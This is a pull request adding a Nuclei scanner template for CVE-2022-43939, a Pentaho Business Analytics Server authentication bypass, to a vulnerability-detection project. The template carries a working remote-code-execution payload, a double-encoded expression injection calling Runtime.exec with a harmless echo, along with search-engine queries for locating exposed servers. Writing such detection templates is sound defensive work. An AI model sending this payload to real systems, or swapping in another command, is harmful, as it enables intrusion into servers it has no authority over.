### PR TITLE
Add Detection for CVE-2022-43939

### DIFF
--- a/README.md
+++ b/README.md
@@ -437,6 +437,7 @@ For the moment, we are currently focused on the CISA KEV Database and Google Tsu
 | CVE-2023-27532                                          |      ❌      | Not remotely exploitable/User interaction needed.       |   2023-03-10   |
 | CVE-2022-41328                                          |      ❌      | Not remotely exploitable/User interaction needed.       |   2023-03-07   |
 | CVE-2019-8720                                           |      ❌      | Not remotely exploitable/User interaction needed.       |   2023-03-06   |
+| CVE-2022-43939                                          |      ✅      | Custom Nuclei template.                                 |   2023-03-04   |
 | CVE-2023-23529                                          |      ❌      | Not remotely exploitable/User interaction needed.       |   2023-02-27   |
 | CVE-2022-47986                                          |      ✅      | Official Nuclei template.                               |   2023-02-17   |
 | CVE-2023-23752                                          |      ✅      | Official Nuclei template.                               |   2023-02-16   |

--- a/agent_group.yaml
+++ b/agent_group.yaml
@@ -319,6 +319,7 @@ agents:
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-53704.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2025-0108.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2022-47945.yaml
+            - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2022-43939.yaml
       - name: use_default_templates
         type: boolean
         description: use nuclei's default templates to scan.

--- a/nuclei/CVE-2022-43939.yaml
+++ b/nuclei/CVE-2022-43939.yaml
@@ -1,0 +1,65 @@
+id: CVE-2022-43939
+
+info:
+  name: Hitachi Vantara Pentaho Business Analytics Server - Auth Bypass & RCE
+  author: ProjectDiscoveryAI (updated by Ostorlab)
+  severity: critical
+  description: |
+    Hitachi Vantara’s Pentaho Business Analytics Server versions prior to 9.4.0.1, 9.3.0.2, and all 8.3.x are vulnerable due to improper handling of non-canonical URL paths during authorization decisions.
+    This flaw, which is actively exploited in the wild, allows attackers not only to bypass security restrictions but, when chained with CVE-2022-43769, to execute arbitrary commands (RCE) on the server.
+  impact: |
+    Exploitation may result in:
+      - Unauthorized access via authentication bypass.
+      - Remote Code Execution when chained with CVE-2022-43769.
+      - Potential complete system compromise.
+  remediation: |
+    - Upgrade to Pentaho Business Analytics Server version 9.4.0.1 or later.
+    - Implement restrictive authorization filters to further mitigate risks.
+    - Monitor for indicators of compromise given active exploitation.
+  reference:
+    - https://research.aurainfosec.io/pentest/pentah0wnage/
+    - https://www.tenable.com/plugins/was/114248
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
+    cvss-score: 8.6
+    cve-id: CVE-2022-43939
+    cwe-id: CWE-647,NVD-CWE-noinfo
+    epss-score: 0.00315
+    epss-percentile: 0.71059
+    cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*
+  metadata:
+    vendor: hitachi
+    product: vantara_pentaho_business_analytics_server
+    shodan-query: http.favicon.hash:1749354953
+    fofa-query: icon_hash=1749354953
+
+variables:
+  random_int: '{{rand_int(1,1000)}}'
+
+http:
+  # Original endpoint check for non-canonical URL bypass
+  - method: GET
+    path:
+      - "{{BaseURL}}/pentaho/api/repos/:public:/:"
+      - "{{BaseURL}}/pentaho/api/repos/%3Apublic%3A/%3A"
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "Pentaho"
+        part: body
+
+  # Vulnerability check: Uses a double-encoded payload with a random integer to bypass URL parser restrictions.
+  - method: GET
+    path:
+      - "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%2523%257BT%2528java.lang.Runtime%2529.getRuntime().exec(%2527echo%2520{{random_int}}%2527)%257D&mgrDn=a&pwd=a"
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "{{random_int}}"
+        part: body


### PR DESCRIPTION
- The original template was modified to to also include the PoC published by [Aura Info Sec](https://research.aurainfosec.io/pentest/pentah0wnage/).

- None of the targets against whom the template was tested were vulnerable. 
